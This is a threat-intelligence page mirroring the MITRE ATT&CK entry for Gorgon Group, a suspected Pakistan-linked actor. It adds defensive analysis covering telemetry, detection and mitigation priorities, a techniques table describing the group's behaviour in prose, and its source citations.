G0078: Gorgon Group
Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. [1]
Analyst context for executives and security teams
Gorgon Group matters because ATT&CK links it to both targeted government campaigns and criminal-style activity, with observed use of commodity remote access tools such as QuasarRAT, Remcos, NanoCore, and njRAT. For leaders, the defensive takeaway is not a single bespoke actor profile; it is whether the organization can detect and contain common RAT-enabled intrusion patterns that start with malicious attachments and progress through script execution, registry/startup persistence, tool transfer, and stealthy process behavior.
Executive priority
Prioritize this as a readiness test for phishing resilience, Windows endpoint visibility, and incident response containment of remote access tooling. The ATT&CK record does not provide active-exploitation or sector-specific exposure claims, but it does show a group associated with campaigns against government organizations in multiple countries and a technique set that can support unauthorized access, persistence, defense evasion, and command-and-control. Executives should ask whether email security, endpoint logging, SOC triage, and IR playbooks can prove coverage for malicious files, PowerShell/cmd/VB execution, registry persistence, and RAT activity rather than relying only on malware names.
Technical view
The relationship context points defenders toward validating behavior-based coverage around spearphishing attachments, user-opened malicious files, Windows scripting and command execution, registry modification, Run Keys/startup folders, shortcut persistence, process injection/hollowing, deobfuscation, hidden windows, ingress tool transfer, native API execution, and attempts to disable or modify defensive tools. Several related software entries are Windows RATs, so Windows endpoint telemetry is especially important where those tools are relevant; however, the group object itself does not specify platforms or tactics. SOC teams should correlate attachment delivery and user execution with child processes, script interpreter activity, suspicious persistence writes, unusual network connections, and endpoint-defense tampering indicators.
Likely telemetry
- Email gateway and mailbox telemetry for spearphishing attachments and user interaction with malicious files
- Endpoint process creation and command-line telemetry for PowerShell, cmd, Visual Basic, and suspicious child processes
- Windows Registry and startup folder monitoring for Run Keys, persistence entries, and shortcut modification
- Endpoint memory/process telemetry capable of surfacing PE injection or process hollowing indicators
- Network and proxy/DNS telemetry for remote access tool communications and ingress tool transfer
Detection direction
- Validate detections by behavior chain, not only by signatures for QuasarRAT, Remcos, NanoCore, or njRAT, because the related tooling includes publicly available or commercial remote access software that may vary by build and configuration.
- Tune PowerShell, cmd, and Visual Basic analytics to distinguish routine administration from suspicious execution following email attachment activity or from unusual user-writable paths.
- Monitor registry and startup persistence changes in user and system contexts, with allowlists for approved software installers and administrative scripts.
- Correlate process injection/hollowing signals with parent process lineage, unsigned or unexpected binaries, and post-execution network activity to reduce false positives.
- Include visibility checks for endpoint security impairment, since related behavior includes disabling or modifying tools; absence of telemetry from a host should be treated as an investigative signal, not just a data gap.
Mitigation priorities
- Strengthen attachment handling, user reporting, and safe execution controls for files delivered by email.
- Harden and monitor script interpreters and command shells, especially PowerShell, cmd, and Visual Basic usage on Windows endpoints.
- Restrict unauthorized persistence mechanisms by monitoring and controlling Registry Run Keys, startup folders, and shortcut modifications.
- Maintain endpoint protection and logging resilience, including alerting on disabled or modified security tools and gaps in agent check-in.
- Control outbound network paths and file transfer opportunities used for tool ingress, while preserving logs needed for investigation.
Analyst notes and limits
This take is based on the supplied ATT&CK group description, external references, and explicit relationships. The most decision-useful context is the combination of suspected Pakistan connections, campaigns against government organizations in the UK, Spain, Russia, and the US, and the linked use of multiple RATs plus execution, persistence, stealth, command-and-control, and defense-impairment techniques. The relationship set is suitable for control validation and detection planning, but it should not be treated as a complete or current campaign profile without additional intelligence.
MITRE does not provide official detection guidance for this group object, and the group-level platforms and tactics are not specified. Several platform statements come from related techniques and software rather than the group object itself. No claim is made here about active exploitation, current targeting, attribution certainty, or guaranteed detection coverage.
Gorgon Group
Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. [1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1055.012 | Process Hollowing Sub-technique | Gorgon Group malware can use process hollowing to inject one of its trojans into another process.CitationUnit 42 Gorgon Group Aug 2018 |
| Enterprise | T1685 | Disable or Modify Tools | Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Gorgon Group malware can decode contents from a payload that was Base64 encoded and write the contents to a file.CitationUnit 42 Gorgon Group Aug 2018 |
| Enterprise | T1106 | Native API | Gorgon Group malware can leverage the Windows API call, CreateProcessA(), for execution.CitationUnit 42 Gorgon Group Aug 2018 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.CitationUnit 42 Gorgon Group Aug 2018 |
| Enterprise | T1059.001 | PowerShell Sub-technique | Gorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.CitationUnit 42 Gorgon Group Aug 2018 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.CitationUnit 42 Gorgon Group Aug 2018 |
| Enterprise | T1105 | Ingress Tool Transfer | Gorgon Group malware can download additional files from C2 servers.CitationUnit 42 Gorgon Group Aug 2018 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Gorgon Group sent emails to victims with malicious Microsoft Office documents attached.CitationUnit 42 Gorgon Group Aug 2018 |
| Enterprise | T1564.003 | Hidden Window Sub-technique | Gorgon Group has used |
| Enterprise | T1055.002 | Portable Executable Injection Sub-technique | Gorgon Group malware can download a remote access tool, ShiftyBug, and inject into another process.CitationUnit 42 Gorgon Group Aug 2018 |
| Enterprise | T1112 | Modify Registry | Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under |
| Enterprise | T1547.009 | Shortcut Modification Sub-technique | Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.CitationUnit 42 Gorgon Group Aug 2018 |
| Enterprise | T1204.002 | Malicious File Sub-technique | Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.CitationUnit 42 Gorgon Group Aug 2018 |
| Enterprise | T1588.002 | Tool Sub-technique | Gorgon Group has obtained and used tools such as QuasarRAT and Remcos.CitationUnit 42 Gorgon Group Aug 2018 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | Gorgon Group has used macros in Spearphishing Attachments as well as executed VBScripts on victim machines.CitationUnit 42 Gorgon Group Aug 2018 |
Groups, software, and campaigns
S0336: NanoCore
S0262: QuasarRAT
S0332: Remcos
S0385: njRAT
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.5 | Current bundle | dc2aa87bf2f9… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Unit 42 Gorgon Group Aug 2018
Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.
Open source URL -
[2]
Gorgon Group
(Citation: Unit 42 Gorgon Group Aug 2018)
-
[3]
mitre-attack G0078Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.